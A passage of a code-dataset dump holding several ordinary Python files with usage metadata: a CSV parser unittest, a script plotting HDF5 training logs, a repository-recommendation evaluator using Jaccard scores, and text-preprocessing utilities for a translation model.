"app.schemas.job_search_service", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 36, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 39, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.create_metadata", "line_number": 39, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 40, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "9804263156", "text": "import csv\nimport unittest\n\nimport parse\n\nclass TestParse(unittest.TestCase):\n FILES = ['data/inputFile1.csv', 'data/inputFile2.csv', 'data/inputFile3.csv']\n\n def test_parse_row(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parse.parse_row(row)\n\n def test_parse_csv(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n parse.parse_csv(csv_file)\n\n def test_idempotent(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parsed = parse.parse_row(row)\n if isinstance(parsed, parse.HourOut):\n out_row = parsed.to_row()\n parsed2 = parse.parse_row(out_row)\n self.assertEqual(parsed, parsed2)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "sean-purcell/oec2020", "sub_path": "parse_test.py", "file_name": "parse_test.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 25, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 28, "usage_type": "call"}, {"api_name": "parse.HourOut", "line_number": 29, "usage_type": "attribute"}, {"api_name": "parse.parse_row", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "17129684663", "text": "import numpy as np \r\nimport h5py\r\nimport matplotlib.pyplot as plt \r\nimport argparse\r\nimport pandas as pd \r\nfrom scipy import signal \r\nimport seaborn as sns\r\nfrom IPython.core.debugger import Pdb\r\n\r\nEXPERT_MEAN = 9790.99989735\r\nEXPERT_STD = 1175.06649136\r\n\r\ndef moving_average(inp,window_size):\r\n\tfilt = np.ones((window_size))\r\n\tfilt = filt/len(filt)\r\n\tout = np.convolve(inp, filt, \"same\")\r\n\treturn out\r\n\r\ndef plot_log_file(filename, fields_to_plot, save_dir, use_moving_average, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tplt.figure()\r\n\thandles=[]\r\n\tfor field in fields_to_plot:\r\n\t\tdata = [log[i][field] for i in range(log.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata = moving_average(data, window_size=moving_average_window_size)\r\n\t\ttmp, = plt.plot(data, label=field_names[field])\r\n\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(EXPERT_STD*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_fancy(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean, window_size)\r\n\t\r\n\tstd = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean)\r\n\tplt.fill_between(xrange(mean.shape[0]), [i+j for (i,j) in zip(mean,std)], [i-j for (i,j) in zip(mean,std)], facecolor='b', alpha=0.25)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_fancy.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_mean_with_raw(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean_raw = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean_raw, window_size)\r\n\t\r\n\tstd_raw = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std_raw, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean, color='g')\r\n\tplt.plot(mean_raw, color='g', alpha=0.3)\r\n\tplt.plot(std, color='b')\r\n\tplt.plot(std_raw, color='b', alpha=0.3)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_withRaw.png')\r\n\t# plt.show()\r\n\r\n\r\ndef compare_methods(filename1, filename2, fields_to_plot, save_dir, use_moving_average, use_median_filtering, window_size):\r\n\tf1 = h5py.File(filename1,'r')\r\n\tf2 = h5py.File(filename2,'r')\r\n\tlog1 = f1['log']\r\n\tlog2 = f2['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfor field in fields_to_plot:\r\n\t\tplt.figure()\r\n\t\thandles=[]\r\n\t\tdata1 = [log1[i][field] for i in range(log1.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata1 = moving_average(data1, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata1 = signal.medfilt(data1, window_size)\r\n\t\ttmp, = plt.plot(data1, label=filename1.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tdata2 = [log2[i][field] for i in range(log2.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata2 = moving_average(data2, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata2 = signal.medfilt(data2, window_size)\r\n\t\ttmp, = plt.plot(data2, label=filename2.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tplt.legend(handles=handles)\r\n\t\tplt.grid(True)\r\n\t\tplt.savefig(save_dir+filename1.split('/')[-1][:-3]+'--vs--'+filename2.split('/')[-1][:-3]+'-'+field_names[field]+'.png')\r\n\t\tplt.show()\r\n\r\ndef write_csv(in_filename=None, out_filename=None):\r\n\tf_in = h5py.File(in_filename,'r')\r\n\tlog = f_in['log']\r\n\tf_out = open(out_filename,'w')\r\n\t# field_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"nu\", \"Lambda\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfield_names = [\"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"rloss\", \"racc\", \"rgrad\"]\r\n\t# print fields\r\n\tfor field in field_names:\r\n\t\tf_out.write(field+',')\r\n\tf_out.write('\\n')\r\n\r\n\t# print the log data line by line\r\n\tfor line_num in range(log.shape[0]):\r\n\t\tfor entry in log[line_num]:\r\n\t\t\tf_out.write(str(entry)+',')\r\n\t\tf_out.write('\\n')\r\n\tf_out.close()\r\n\r\n\r\ndef plot_csv(file_name, use_moving_average, moving_average_window_size, plot_all_fields, plot_fields, save_dir, expert_level):\r\n\tdf = pd.read_csv(file_name, sep=',')\r\n\ttitles = list(df)\r\n\tplt.figure()\r\n\thandles = []\r\n\tif plot_all_fields:\r\n\t\tfor i in range(len(titles)):\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\telse:\r\n\t\tfor i in plot_fields:\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(expert_level*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+file_name.split('/')[-1][:-4]+'.png')\r\n\tplt.show()\r\n\r\n\r\nif __name__=='__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--plot_single', action='store_true')\r\n\tparser.add_argument('--plot_fancy', action='store_true')\r\n\tparser.add_argument('--plot_fancy_raw', action='store_true')\r\n\tparser.add_argument('--file_name', type=str, help=\".h5 file path if --plot_single or --write_csv and .csv file path if --plot_csv\")\r\n\tparser.add_argument('--compare', action='store_true')\r\n\tparser.add_argument('--file_name1', type=str, help=\".h5 file path 1 if --compare\")\r\n\tparser.add_argument('--file_name2', type=str, help=\".h5 file path 2 if --compare\")\r\n\tparser.add_argument('--save_dir', type=str, default=\"./\", help=\"directory for saving plots\")\r\n\tparser.add_argument('--use_moving_average', action='store_true')\r\n\tparser.add_argument('--use_median_filtering', action='store_true')\r\n\tparser.add_argument('--moving_average_window_size', type=int, default=3)\r\n\tparser.add_argument('--write_csv', action='store_true')\r\n\tparser.add_argument('--plot_csv', action='store_true')\r\n\tparser.add_argument('--plot_all_fields', action='store_true')\r\n\t#TODO: fix the following line - add separate conditions for different fields\r\n\tparser.add_argument('--expert_level', type=float, default=EXPERT_STD)\r\n\r\n\targs = parser.parse_args()\r\n\tfields_to_plot = [1,3]\r\n\tif args.plot_single:\r\n\t\tplot_log_file(args.file_name, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.compare:\r\n\t\tcompare_methods(filename1=args.file_name1, filename2=args.file_name2, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, window_size=args.moving_average_window_size)\r\n\telif args.write_csv:\r\n\t\tout_filename = args.save_dir+args.file_name.split('/')[-1][:-3]+'.csv'\r\n\t\twrite_csv(args.file_name, out_filename)\r\n\telif args.plot_csv:\r\n\t\tplot_fields = [0,1,-1]\r\n\t\tplot_csv(file_name=args.file_name, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size, plot_all_fields=args.plot_all_fields, plot_fields=plot_fields, save_dir=args.save_dir, expert_level=args.expert_level)\r\n\telif args.plot_fancy:\r\n\t\tplot_log_file_fancy(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.plot_fancy_raw:\r\n\t\tplot_log_file_mean_with_raw(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n", "repo_name": "Santara/RAIL", "sub_path": "scripts/read_h5_logs_and_analyse.py", "file_name": "read_h5_logs_and_analyse.py", "file_ext": "py", "file_size_in_byte": 8827, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 16, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 73, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 92, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "23852145195", "text": "# evaluation.py \n# script holding function to evaluate the quality of recommendation based on queried metadata\n\n# last modified : 29/11/21\n# author : jonas-mika senghaas\n\nimport json\nimport os\nimport numpy as np\nfrom tqdm import tqdm\n\n\n#from envvars import GITHUB_TOKEN\n#from github_api import ReposSummary\n\n\"\"\"\n# expected format for recommendations\nmetadata = {'luky/na': {'languages': [['Python', 550], ['Java', 220]]}, \n 'jonas-mika/eduml': {'languages': [['Python', 2000]]},\n 'ludek/dotfiles': {'languages': [['vim', 220], ['Python', 100]]}\n }\n\ndata = {'rails/rails': ['technoweenie/restful-authentication']}\n\n\"\"\"\ndef build_evaluation_metadata(metadata, attributes, filepath='.', name='evaluation_metadata'):\n os.makedirs(filepath) if not os.path.exists(filepath) else None\n\n ans = {}\n for key, val in metadata.items():\n try:\n nkey = metadata[key]['repo_name']\n nval = {attribute: metadata[key][attribute] for attribute in attributes}\n except: None\n\n ans[nkey] = nval\n\n with open(f'{filepath}/{name}.json', 'w') as outfile:\n json.dump(ans, outfile)\n\n\n\ndef evaluate_recommendation(recommendations, metadata, attributes, test_size=0.5, total_score=False):\n \"\"\"\n function to evaluate the quality of the recommendation based on metadata.\n reads in underlying datastructure of the recommendation system (a dictionary that \n for each repo stores a list of n recommended repos, each being stored as a dictionary\n themselves with key being the recommended repo name and values being a dict of the metadata.\n\n Algorithmic Idea for Evaluation:\n A 'good recommendation' is defined to be a repository that is similar in some instances to \n the source repository. Thus, the idea is to assign a score of similarity \n for different features of the recommended repositories, namely for:\n - languages ( len of intersection / length of union of languages for each repo)\n - tags ( len of intersectio / length of union of repos for each repo)\n\n the score is averaged over the n recommended repository, the per repo score is a weighted\n average. the total score is averaged over all recommendations.\n \"\"\"\n n_repos = len(recommendations)\n\n\n if isinstance(test_size, int):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=test_size, replace=False) \n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n elif isinstance(test_size, float):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=int(test_size*n_repos), replace=False)\n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n\n random_sample = recommendations\n attribute_scores = {attribute: None for attribute in attributes}\n for attribute in attributes:\n attribute_score = _evaluate_attribute(random_sample, \n metadata, \n attribute, \n algorithm='jaccard', normalise=True)\n attribute_scores[attribute] = attribute_score\n\n if total_score:\n return np.mean(list(attribute_scores.values()))\n return attribute_scores\n\n\ndef _evaluate_attribute(random_sample, metadata, attribute, algorithm='jaccard', normalise=True):\n attribute_score = 0\n\n n_repos = len(random_sample)\n #n_recommend = len(list(random_sample.values())[0])\n\n # api = ReposSummary(GITHUB_TOKEN)\n\n src_missing = 0 \n for repo in random_sample: # maybe: subset of repos\n repo_score = 0\n\n src = metadata[repo] \n #print('working on: ', repo)\n src_attr = {x[0] for x in src[attribute]}\n\n if src_attr == None:\n src_missing += 1\n continue\n\n trg_missing = 0\n n_recommend = 0\n for recommended in random_sample[repo]:\n trg = metadata[recommended]\n trg_attr = {x[0] for x in trg[attribute]}\n\n if trg_attr == None:\n trg_missing += 1\n continue\n\n #print(src_attr, trg_attr)\n score = len(src_attr & trg_attr) / len(src_attr | trg_attr)\n #print(score)\n repo_score += score\n n_recommend += 1\n\n # normalise all score\n if n_recommend - trg_missing > 0:\n repo_score /= (n_recommend - trg_missing) \n else:\n repo_score = 0\n #print(repo_score, '\\n')\n attribute_score += repo_score\n\n # normalise summed attributes score and add total score\n if n_repos - src_missing > 0:\n attribute_score /= (n_repos - src_missing)\n else:\n attribute_score = 0\n\n return attribute_score\n\n\nif __name__ == '__main__':\n np.random.seed(0)\n with open('../data/transformed/metadata.json') as infile:\n metadata = json.load(infile)\n\n build_evaluation_metadata(metadata, ['languages'],filepath='../data/evaluation/')\n with open('../data/evaluation/evaluation_metadata.json', 'r') as infile:\n metadata = json.load(infile)\n\n algs = ['naive_hyperbolic','search_depth_hyperbolic'] #['naive_recommend', 'search_depth']\n\n for alg in algs:\n with open(f'./{alg}.json', 'r') as infile:\n data = json.load(infile)\n\n print(alg, ':', evaluate_recommendation(data, metadata, attributes=['languages'], test_size=0.5))\n", "repo_name": "ludekcizinsky/project-repommend", "sub_path": "cscripts/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 5464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "json.load", "line_number": 144, "usage_type": "call"}, {"api_name": "json.load", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "7091435767", "text": "import re\r\nimport unicodedata\r\nimport torch\r\n\r\nfrom dictionary import Dictionary\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#https://stackoverflow.com/a/518232/2809427\r\ndef unicodeToAscii(s):\r\n return ''.join(\r\n c for c in unicodedata.normalize('NFD', s)\r\n if unicodedata.category(c) != 'Mn'\r\n )\r\n\r\ndef normalizeString(s):\r\n s = unicodeToAscii(s.lower().strip())\r\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\r\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\r\n return s\r\n\r\n#load language into lists of sentences where corresponding indeces are translations from\r\n#one language to the other\r\n\r\n#reverse controls with language is input and output\r\n#FALSE: lang1 is input and lang2 is output\r\n#TRUE: lang2 is input and lang1 is output\r\ndef load_files(lang1, lang2, data_dir, reverse=True, MAX_FILE_SIZE=100000, MAX_LENGTH=60):\r\n #load first language to list\r\n lang1_list = []\r\n lang1_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang1 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang1_file):\r\n if i < MAX_FILE_SIZE:\r\n lang1_list.append(line)\r\n else:\r\n break\r\n\r\n # load second langauge to list\r\n lang2_list = []\r\n lang2_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang2 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang2_file):\r\n if i < MAX_FILE_SIZE:\r\n lang2_list.append(line)\r\n else:\r\n break\r\n\r\n #preprocess strings\r\n lang1_normalized = list(map(normalizeString, lang1_list))\r\n lang2_normalized = list(map(normalizeString, lang2_list))\r\n\r\n lang1_sentences = []\r\n lang2_sentences = []\r\n\r\n for i in range(len(lang1_normalized)):\r\n tokens1 = lang1_normalized[i].split(' ')\r\n tokens2 = lang2_normalized[i].split(' ')\r\n if len(tokens1) <= MAX_LENGTH and len(tokens2) <= MAX_LENGTH:\r\n lang1_sentences.append(lang1_normalized[i])\r\n lang2_sentences.append(lang2_normalized[i])\r\n\r\n del lang1_normalized\r\n del lang2_normalized\r\n\r\n if reverse:\r\n input_dic = Dictionary(lang2)\r\n output_dic = Dictionary(lang1)\r\n return input_dic, output_dic, lang2_sentences, lang1_sentences\r\n else:\r\n input_dic = Dictionary(lang1)\r\n output_dic = Dictionary(lang2)\r\n return input_dic, output_dic, lang1_sentences, lang2_sentences\r\n\r\n#takes in a sentence and dictionary, and tokenizes based on dictionary\r\ndef tokenize(sentence, dictionary, MAX_LENGTH=60):\r\n split_sentence = [word for word in sentence.split(' ')]\r\n token = [SOS_TOKEN]\r\n token += [dictionary.word2index[word] for word in sentence.split(' ')]\r\n token.append(EOS_TOKEN)\r\n token += [PAD_TOKEN]*(MAX_LENGTH - len(split_sentence))\r\n return token\r\n\r\n#create dataloader from a batch size and the two language lists\r\ndef load_batches(input_lang, output_lang, batch_size, device):\r\n data_loader = []\r\n for i in range(0, len(input_lang), batch_size):\r\n seq_length = min(len(input_lang) - batch_size, batch_size)\r\n input_batch = input_lang[i:i+seq_length][:]\r\n target_batch = output_lang[i:i+seq_length][:]\r\n input_tensor = torch.LongTensor(input_batch).to(device)\r\n target_tensor = torch.LongTensor(target_batch).to(device)\r\n data_loader.append([input_tensor, target_tensor])\r\n return data_loader", "repo_name": "u7javed/Transformer-Multi-Language-Translator", "sub_path": "utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unicodedata.normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "unicodedata.category", "line_number": 15, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 67, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 68, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 71, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 72, "usage_type": "call"}, {"api_name": "dictionary.word2index", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "27952832416", "text": "import 